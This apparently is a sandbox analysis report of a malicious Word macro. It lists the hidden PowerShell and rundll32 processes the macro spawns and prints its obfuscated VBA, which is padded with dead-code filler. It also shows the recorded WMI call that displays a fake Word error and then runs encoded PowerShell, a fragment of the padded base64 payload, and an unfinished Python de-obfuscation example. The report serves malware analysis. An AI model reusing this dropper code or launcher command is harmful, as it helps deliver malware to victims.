                      Start date: 12/01/2021
                      Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit): false
                      Commandline: powershell -w hidden -enc (base64-encoded command argument omitted)
                      Imagebase:0x13fab0000
                      File size:473600 bytes
                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      General

                      Start time:20:30:40
                      Start date:12/01/2021
                      Path:C:\Windows\System32\rundll32.exe
                      Wow64 process (32bit):false
                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
                      Imagebase:0xffdd0000
                      File size:45568 bytes
                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:40
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:41
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:42
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:43
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:44
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:45
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:45
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:46
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:47
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Disassembly

                      Code Analysis

                      Module: Gx8fznt8p0b

                      Declaration
                      Line | Content
                      1

                      Attribute VB_Name = "Gx8fznt8p0b"

                      Executed Functions
                      APIs | Meta Information

                      Xaem5y61ivq

                      Hj9iyfe3bvb

                      StoryRanges

                      wdMainTextStory

                      Xrsb1iydy1_t2h

                      ykgfGkNf

                      Fix

                      BzbdEl

                      BzbdEl

                      Fix

                      Fix

                      mZXJjJAgq

                      Fix

                      JfXdCsEp

                      JfXdCsEp

                      Fix

                      Fix

                      MSsFhG

                      Fix

                      DJlZDCM

                      DJlZDCM

                      Fix

                      Fix

                      VDhTuRJ

                      Fix

                      QWDldHHR

                      QWDldHHR

                      Fix

                      Fix

                      Mid

                      Name

                      Application

                      FBkjB

                      Fix

                      reejhCJo

                      reejhCJo

                      Fix

                      Fix

                      ICwOHad

                      Fix

                      PNjoAGP

                      PNjoAGP

                      Fix

                      Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: zCXyyY

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: JSrfhd

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: JSrfhd

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: szALCGBF

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: XFTxEQJDN

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: XFTxEQJDN

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: YjbuICHY

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: RXvmIZQm

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: RXvmIZQm

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: rUIOAx

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: gIKrmCJj

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: gIKrmCJj

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      GlHkEN

                      Fix

                      shylMG

                      shylMG

                      Fix

                      Fix

                      CreateObject

                      CreateObject("winmgmts:win32_process")

                      nDpnHa

                      Fix

                      neULB

                      neULB

                      Fix

                      Fix

                      SgwfJAm

                      Fix

                      aDUvJDOI

                      aDUvJDOI

                      Fix

                      Fix

                      GqPOTjZ

                      Fix

                      xSGbCJ

                      xSGbCJ

                      Fix

                      Fix

                      Create

                      SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc [base64-encoded PowerShell argument omitted]",,) -> 0

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: zCXyyY

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: JSrfhd

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: JSrfhd

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: szALCGBF

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: XFTxEQJDN

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: XFTxEQJDN

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: YjbuICHY

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: RXvmIZQm

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: RXvmIZQm

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: rUIOAx

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: gIKrmCJj

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: gIKrmCJj

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Mid

                      Len

                      Len("[obfuscated 16527-character string omitted]") -> 16527

                      Vc1971csmq7a5g9

                      W7x42qfm4_lw

                      dUNUgHJG

                      Fix

                      kshfoytP

                      kshfoytP

                      Fix

                      Fix

                      SetWuCGdA

                      Fix

                      ZYHZlIii

                      ZYHZlIii

                      Fix

                      Fix

                      Strings | Decrypted Strings
                      "w]xm[vpw]xm[v"
                      "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
                      "w]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[v"
                      "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
                      "w]xm[vw]xm[v"
                      Line | Instruction | Meta Information
                      2

                      Function Bn2p1rxokklh_9o8()

                      3

                      On Error Resume Next

                      executed
                      4

                      Ypgqgc4wnez0kz = Xaem5y61ivq

                      Xaem5y61ivq

                      5

                      dsfe = Hj9iyfe3bvb + Kyl0l3rqw280c6ssa.StoryRanges(wdMainTextStory) + Xrsb1iydy1_t2h

                      Hj9iyfe3bvb

                      StoryRanges

                      wdMainTextStory

                      Xrsb1iydy1_t2h

                      6

                      Goto BzbdEl

                      7

                      Set CuCzGCw = ykgfGkNf

                      ykgfGkNf

                      8

                      Dim BhhWnCHb as Double

                      9

                      BhhWnCHb = Fix(BzbdEl)

                      Fix

                      BzbdEl

                      10

                      If BhhWnCHb <> BzbdEl Then

                      BzbdEl

                      10

                      Exit Function

                      10

                      Endif

                      11

                      Dim sJrfKHHt as Double

                      12

                      sJrfKHHt = BhhWnCHb ^ (1 / 3)

                      13

                      If Fix(sJrfKHHt) ^ 3 = BhhWnCHb Then

                      Fix

                      14

                      iKSwBkUWG = True

                      15

                      Elseif (Fix(sJrfKHHt) + 1) ^ 3 = BhhWnCHb Then

                      Fix

                      16

                      iKSwBkUWG = True

                      17

                      Endif

                      17

                      BzbdEl:

                      19

                      g42 = "w]xm[vpw]xm[v"

                      20

                      Nux0owfnim4 = "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"

                      21

                      Goto JfXdCsEp

                      22

                      Set xTZpYXiBF = mZXJjJAgq

                      mZXJjJAgq

                      23

                      Dim DheYzB as Double

                      24

                      DheYzB = Fix(JfXdCsEp)

                      Fix

                      JfXdCsEp

                      25

                      If DheYzB <> JfXdCsEp Then

                      JfXdCsEp

                      25

                      Exit Function

                      25

                      Endif

                      26

                      Dim fRfgHB as Double

                      27

                      fRfgHB = DheYzB ^ (1 / 3)

                      28

                      If Fix(fRfgHB) ^ 3 = DheYzB Then

                      Fix

                      29

                      cMaNE = True

                      30

                      Elseif (Fix(fRfgHB) + 1) ^ 3 = DheYzB Then

                      Fix

                      31

                      cMaNE = True

                      32

                      Endif

                      32

                      JfXdCsEp:

                      34

                      Tkegc8hi7tjrwtr9oa = "w]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[v"

                      35

                      Goto DJlZDCM

                      36

                      Set TgbVU = MSsFhG

                      MSsFhG

                      37

                      Dim NfAUFNI as Double

                      38

                      NfAUFNI = Fix(DJlZDCM)

                      Fix

                      DJlZDCM

                      39

                      If NfAUFNI <> DJlZDCM Then

                      DJlZDCM

                      39

                      Exit Function

                      39

                      Endif

                      40

                      Dim tYFukEBCC as Double

                      41

                      tYFukEBCC = NfAUFNI ^ (1 / 3)

                      42

                      If Fix(tYFukEBCC) ^ 3 = NfAUFNI Then

                      Fix

                      43

                      MwLbBJBFI = True

                      44

                      Elseif (Fix(tYFukEBCC) + 1) ^ 3 = NfAUFNI Then

                      Fix

                      45

                      MwLbBJBFI = True

                      46

                      Endif

                      46

                      DJlZDCM:

                      48

                      Aquvchbfc1s = "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"

                      49

                      Goto QWDldHHR

                      50

                      Set UnYMEIiCD = VDhTuRJ

                      VDhTuRJ

                      51

                      Dim hzXmmAn as Double

                      52

                      hzXmmAn = Fix(QWDldHHR)

                      Fix

                      QWDldHHR

                      53

                      If hzXmmAn <> QWDldHHR Then

                      QWDldHHR

                      53

                      Exit Function

                      53

                      Endif

                      54

                      Dim AiEWeBgBl as Double

                      55

                      AiEWeBgBl = hzXmmAn ^ (1 / 3)

                      56

                      If Fix(AiEWeBgBl) ^ 3 = hzXmmAn Then

                      Fix

                      57

                      jzjFFpDhA = True

                      58

                      Elseif (Fix(AiEWeBgBl) + 1) ^ 3 = hzXmmAn Then

                      Fix

                      59

                      jzjFFpDhA = True

                      60

                      Endif

                      60

                      QWDldHHR:

                      62

                      Wut_mfci5kk4lb = "w]xm[vw]xm[v" + Mid(Application.Name, 4 + 2, 2 - 1) + "w]xm[vw]xm[v"

                      Mid

                      Name

                      Application

                      63

                      Goto reejhCJo

                      64

                      Set TMBZGWW = FBkjB

                      FBkjB

                      65

                      Dim eEAOBGE as Double

                      66

                      eEAOBGE = Fix(reejhCJo)

                      Fix

                      reejhCJo

                      67

                      If eEAOBGE <> reejhCJo Then

                      reejhCJo

                      67

                      Exit Function

                      67

                      Endif

                      68

                      Dim cYdfo as Double

                      69

Function Bn2p1rxokklh_9o8 (module Gx8fznt8p0b), continued; the listing starts mid-function. Sandbox meta information for an instruction is shown as a trailing ' comment:

    cYdfo = eEAOBGE ^ (1 / 3)
    If Fix(cYdfo) ^ 3 = eEAOBGE Then
        tqIkDIrD = True
    Elseif (Fix(cYdfo) + 1) ^ 3 = eEAOBGE Then
        tqIkDIrD = True
    Endif
reejhCJo:
    Kj4qbrmlwd2552l4 = Aquvchbfc1s + Wut_mfci5kk4lb + Tkegc8hi7tjrwtr9oa + g42 + Nux0owfnim4
    Goto PNjoAGP
    Set OkSpwDa = ICwOHad
    Dim lmdMEA as Double
    lmdMEA = Fix(PNjoAGP)
    If lmdMEA <> PNjoAGP Then
        Exit Function
    Endif
    Dim ZJLnFB as Double
    ZJLnFB = lmdMEA ^ (1 / 3)
    If Fix(ZJLnFB) ^ 3 = lmdMEA Then
        fZVmJ = True
    Elseif (Fix(ZJLnFB) + 1) ^ 3 = lmdMEA Then
        fZVmJ = True
    Endif
PNjoAGP:
    Ls12h2gypqhb = Ipls8rqp952u2lk1(Kj4qbrmlwd2552l4)
    Goto shylMG
    Set cuCYC = GlHkEN
    Dim THkIAUF as Double
    THkIAUF = Fix(shylMG)
    If THkIAUF <> shylMG Then
        Exit Function
    Endif
    Dim CcLHCeb as Double
    CcLHCeb = THkIAUF ^ (1 / 3)
    If Fix(CcLHCeb) ^ 3 = THkIAUF Then
        rvmetA = True
    Elseif (Fix(CcLHCeb) + 1) ^ 3 = THkIAUF Then
        rvmetA = True
    Endif
shylMG:
    Set Sy6vvpgixx8z_5f = CreateObject(Ls12h2gypqhb)    ' executed: CreateObject("winmgmts:win32_process")
    Goto neULB
    Set gpBWaEPFj = nDpnHa
    Dim aEWwP as Double
    aEWwP = Fix(neULB)
    If aEWwP <> neULB Then
        Exit Function
    Endif
    Dim PgRakD as Double
    PgRakD = aEWwP ^ (1 / 3)
    If Fix(PgRakD) ^ 3 = aEWwP Then
        PohBnF = True
    Elseif (Fix(PgRakD) + 1) ^ 3 = aEWwP Then
        PohBnF = True
    Endif
neULB:
    Goto aDUvJDOI
    Set gpIBBDhi = SgwfJAm
    Dim ulfWCCiFF as Double
    ulfWCCiFF = Fix(aDUvJDOI)
    If ulfWCCiFF <> aDUvJDOI Then
        Exit Function
    Endif
    Dim bONvDCElF as Double
    bONvDCElF = ulfWCCiFF ^ (1 / 3)
    If Fix(bONvDCElF) ^ 3 = ulfWCCiFF Then
        MybcQH = True
    Elseif (Fix(bONvDCElF) + 1) ^ 3 = ulfWCCiFF Then
        MybcQH = True
    Endif
aDUvJDOI:
    Goto xSGbCJ
    Set WJzJI = GqPOTjZ
    Dim UYbmGGDC as Double
    UYbmGGDC = Fix(xSGbCJ)
    If UYbmGGDC <> xSGbCJ Then
        Exit Function
    Endif
    Dim nYjBpD as Double
    nYjBpD = UYbmGGDC ^ (1 / 3)
    If Fix(nYjBpD) ^ 3 = UYbmGGDC Then
        HRHrHJDlD = True
    Elseif (Fix(nYjBpD) + 1) ^ 3 = UYbmGGDC Then
        HRHrHJDlD = True
    Endif
xSGbCJ:
    Sy6vvpgixx8z_5f.Create Ipls8rqp952u2lk1(Mid(dsfe, (1 + 4), Len(dsfe))), Vc1971csmq7a5g9, W7x42qfm4_lw    ' executed; the resolved call and the Len argument follow

Resolved call recorded by the sandbox for the Create line (the return value 0 means Win32_Process.Create succeeded; the command first pops a fake Word error via msg.exe, then runs a hidden PowerShell with an encoded command):

                      SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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,,) -> 0

Argument and result recorded for the Len call on dsfe (the raw, marker-padded string: 16527 characters):

                      Len("\x01 w]xm[vw]xm[vcw]xm[vmw]xm[vdw]xm[v w]xm[vcw]xm[vmw]xm[vdw]xm[v w]xm[v/w]xm[vcw]xm[v w]xm[vmw]xm[v^w]xm[vsw]xm[v^w]xm[vgw]xm[v w]xm[v%w]xm[vuw]xm[vsw]xm[vew]xm[vrw]xm[vnw]xm[vaw]xm[vmw]xm[vew]xm[v%w]xm[v w]xm[v/w]xm[vvw]xm[v w]xm[vWw]xm[vow]xm[v^w]xm[vrw]xm[vdw]xm[v w]xm[vew]xm[vxw]xm[vpw]xm[v^w]xm[vew]xm[vrw]xm[viw]xm[vew]xm[vnw]xm[v^w]xm[vcw]xm[vew]xm[vdw]xm[v w]xm[vaw]xm[vnw]xm[v w]xm[vew]xm[vrw]xm[v^w]xm[vrw]xm[vow]xm[vrw]xm[v w]xm[vtw]xm[vrw]xm[vyw]xm[viw]xm[v^w]xm[vnw]xm[vgw]xm[v w]xm[vtw]xm[vow]xm[v w]xm[vow]xm[vpw]xm[v^w]xm[vew]xm[vnw]xm[v w]xm[vtw]xm[vhw]xm[v^w]xm[vew]xm[v w]xm[vfw]xm[viw]xm[v^w]xm[vlw]xm[vew]xm[v.w]xm[v w]xm[v&w]xm[v w]xm[vpw]xm[v^w]xm[vow]xm[vww]xm[vew]xm[v^w]xm[vrw]xm[vsw]xm[v^w]xm[vhw]xm[vew]xm[v^w]xm[vlw]xm[vlw]xm[v^w]xm[v w]xm[v-w]xm[vww]xm[v w]xm[vhw]xm[viw]xm[v^w]xm[vdw]xm[vdw]xm[v^w]xm[vew]xm[vnw]xm[v w]xm[v-w]xm[v^w]xm[vew]xm[v^w]xm[vnw]xm[vcw]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v 
IAAw]xm[vgACw]xm[vQAOw]xm[vABaw]xm[vAEcw]xm[vAIAw]xm[vAgAw]xm[vD0Aw]xm[vIABw]xm[vbAHw]xm[vQAWw]xm[vQBww]xm[vAGUw]xm[vAXQw]xm[vAoAw]xm[vCIAw]xm[vewAw]xm[vyAHw]xm[v0Aew]xm[vwA1w]xm[vAH0w]xm[vAeww]xm[vAwAw]xm[vH0Aw]xm[vewAw]xm[vxAHw]xm[v0Aew]xm[vwAzw]xm[vAH0w]xm[vAeww]xm[vA0Aw]xm[vH0Aw]xm[vIgAw]xm[vtAGw]xm[vYAIw]xm[vAAnw]xm[vAFQw]xm[vARQw]xm[vAnAw]xm[vCwAw]xm[vJwBw]xm[vtACw]xm[v4AJw]xm[vwAsw]xm[vACcw]xm[vAUww]xm[vB5Aw]xm[vCcAw]xm[vLAAw]xm[vnAGw]xm[vkAbw]xm[vwAnw]xm[vACww]xm[vAJww]xm[vAuAw]xm[vEQAw]xm[vSQBw]xm[vyAEw]xm[vUAQw]xm[vwB0w]xm[vAE8w]xm[vAUgw]xm[vBZAw]xm[vCcAw]xm[vLAAw]xm[vnAFw]xm[vMAJw]xm[vwApw]xm[vADsw]xm[vAIAw]xm[vAgAw]xm[vCAAw]xm[vJABw]xm[vEADw]xm[vAAQw]xm[vwBxw]xm[vACAw]xm[vAPQw]xm[vAgAw]xm[vFsAw]xm[vVABw]xm[vZAHw]xm[vAAZw]xm[vQBdw]xm[vACgw]xm[vAIgw]xm[vB7Aw]xm[vDIAw]xm[vfQBw]xm[v7ADw]xm[vEAfw]xm[vQB7w]xm[vADAw]xm[vAfQw]xm[vB7Aw]xm[vDMAw]xm[vfQBw]xm[v7ADw]xm[vQAfw]xm[vQAiw]xm[vACAw]xm[vALQw]xm[vBmAw]xm[vCcAw]xm[vcwBw]xm[vFAHw]xm[vIAdw]xm[vgBJw]xm[vAEMw]xm[vARQw]xm[vBQAw]xm[vG8Aw]xm[vJwAw]xm[vsACw]xm[vcAVw]xm[vABlw]xm[vAG0w]xm[vALgw]xm[vBuAw]xm[vEUAw]xm[vdAAw]xm[vuACw]xm[vcALw]xm[vAAnw]xm[vAFMw]xm[vAWQw]xm[vBzAw]xm[vCcAw]xm[vLAAw]xm[vnAGw]xm[vkATw]xm[vgB0w]xm[vAG0w]xm[vAYQw]xm[vAnAw]xm[vCwAw]xm[vJwBw]xm[vuAEw]xm[vEARw]xm[vwBFw]xm[vAFIw]xm[vAJww]xm[vApAw]xm[vCAAw]xm[vOwAw]xm[vgACw]xm[vQASw]xm[vgBiw]xm[vAHow]xm[vAMww]xm[vB5Aw]xm[vGEAw]xm[vYQAw]xm[v9ACw]xm[vQARw]xm[vAA1w]xm[vADMw]xm[vARQw]xm[vAgAw]xm[vCsAw]xm[vIABw]xm[vbAGw]xm[vMAaw]xm[vABhw]xm[vAHIw]xm[vAXQw]xm[vAoAw]xm[vDYAw]xm[vNAAw]xm[vpACw]xm[vAAKw]xm[vwAgw]xm[vACQw]xm[vAUgw]xm[vA3Aw]xm[vDYAw]xm[vUAAw]xm[v7ACw]xm[vQARw]xm[vwA3w]xm[vADMw]xm[vATww]xm[vA9Aw]xm[vCgAw]xm[vJwBw]xm[vGACw]xm[vcAKw]xm[vwAow]xm[vACcw]xm[vAMAw]xm[vAnAw]xm[vCsAw]xm[vJwAw]xm[v0AFw]xm[vYAJw]xm[vwApw]xm[vACkw]xm[vAOww]xm[vAgAw]xm[vCAAw]xm[vKAAw]xm[vgACw]xm[vAARw]xm[vwBlw]xm[vAHQw]xm[vALQw]xm[vBWAw]xm[vGEAw]xm[vcgBw]xm[vJAEw]xm[vEAQw]xm[vgBsw]xm[vAGUw]xm[vAIAw]xm[vAoAw]xm[vCIAw]xm[vOABw]xm[vaACw]xm[vIAKw]xm[vwAiw]xm[vAGcw]xm[vAIgw]xm[vAp
Aw]xm[vCAAw]xm[vIAAw]xm[vtAHw]xm[vYAQw]xm[vQBsw]xm[vAFUw]xm[vAZQw]xm[vBPAw]xm[vE4Aw]xm[vIAAw]xm[vpADw]xm[voAOw]xm[vgAiw]xm[vAGMw]xm[vAcgw]xm[vBFAw]xm[vGAAw]xm[vQQBw]xm[vgAFw]xm[vQAZw]xm[vQBEw]xm[vAGkw]xm[vAUgw]xm[vBgAw]xm[vGUAw]xm[vQwBw]xm[v0AGw]xm[vAAbw]xm[vwBSw]xm[vAHkw]xm[vAIgw]xm[vAoAw]xm[vCQAw]xm[vSABw]xm[vPAEw]xm[v0ARw]xm[vQAgw]xm[vACsw]xm[vAIAw]xm[vAoAw]xm[vCgAw]xm[vJwBw]xm[v0AEw]xm[vsAJw]xm[vwArw]xm[vACgw]xm[vAJww]xm[vBMAw]xm[vCcAw]xm[vKwAw]xm[vnAEw]xm[vsAJw]xm[vwArw]xm[vACcw]xm[vAagw]xm[vBsAw]xm[vDQAw]xm[vOABw]xm[vrAHw]xm[vIAJw]xm[vwApw]xm[vACsw]xm[vAJww]xm[vB0Aw]xm[vCcAw]xm[vKwAw]xm[voACw]xm[vcASw]xm[vwBMw]xm[vAE4w]xm[vAcQw]xm[vAnAw]xm[vCsAw]xm[vJwBw]xm[vtADw]xm[vkAJw]xm[vwApw]xm[vACsw]xm[vAKAw]xm[vAnAw]xm[vHQAw]xm[vJwAw]xm[vrACw]xm[vcAew]xm[vQA5w]xm[vACcw]xm[vAKQw]xm[vArAw]xm[vCcAw]xm[vdAAw]xm[vnACw]xm[vsAJw]xm[vwBLw]xm[vAEww]xm[vAJww]xm[vApAw]xm[vC0Aw]xm[vcgBw]xm[vlAHw]xm[vAAbw]xm[vABBw]xm[vAGMw]xm[vAZQw]xm[vAgAw]xm[vCAAw]xm[vKAAw]xm[vnAHw]xm[vQASw]xm[vwAnw]xm[vACsw]xm[vAJww]xm[vBMAw]xm[vCcAw]xm[vKQAw]xm[vsAFw]xm[vsAQw]xm[vwBIw]xm[vAEEw]xm[vAcgw]xm[vBdAw]xm[vDkAw]xm[vMgAw]xm[v) -> 16527

    ' (the Create call above was recorded as executed)
    Goto kshfoytP
    Set ggGVJ = dUNUgHJG
    Dim oaACDga as Double
    oaACDga = Fix(kshfoytP)
    If oaACDga <> kshfoytP Then
        Exit Function
    Endif
    Dim RXzua as Double
    RXzua = oaACDga ^ (1 / 3)
    If Fix(RXzua) ^ 3 = oaACDga Then
        dxRvhumeH = True
    Elseif (Fix(RXzua) + 1) ^ 3 = oaACDga Then
        dxRvhumeH = True
    Endif
kshfoytP:
    Goto ZYHZlIii
    Set sTlFD = SetWuCGdA
    Dim CXFGDHlI as Double
    CXFGDHlI = Fix(ZYHZlIii)
    If CXFGDHlI <> ZYHZlIii Then
        Exit Function
    Endif
    Dim QKtUz as Double
    QKtUz = CXFGDHlI ^ (1 / 3)
    If Fix(QKtUz) ^ 3 = CXFGDHlI Then
        dNfeF = True
    Elseif (Fix(QKtUz) + 1) ^ 3 = CXFGDHlI Then
        dNfeF = True
    Endif
ZYHZlIii:
End Function
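Nearly every line of the function above is filler: each Goto LABEL is followed by a Set, a Dim ... as Double, a Fix / cube-root comparison and an Exit Function that can never run, then the label itself. The Python below is an added example for this report, not code from the sandbox or from the macro: it removes each sealed Goto L ... L: region from a VBA listing and reports how much of the text was dead. The excerpt it runs on is assembled from lines of the listing above and is labelled as constructed in the code.

```python
import re

# Constructed excerpt in the style of the Bn2p1rxokklh_9o8 listing above.
# Labels and identifiers are copied from that listing; the excerpt itself is
# assembled here for the demonstration and is not the sandbox's output.
SAMPLE_VBA = """\
Kj4qbrmlwd2552l4 = Aquvchbfc1s + Wut_mfci5kk4lb + Tkegc8hi7tjrwtr9oa + g42 + Nux0owfnim4
Goto PNjoAGP
Set OkSpwDa = ICwOHad
Dim lmdMEA as Double
lmdMEA = Fix(PNjoAGP)
If lmdMEA <> PNjoAGP Then
Exit Function
Endif
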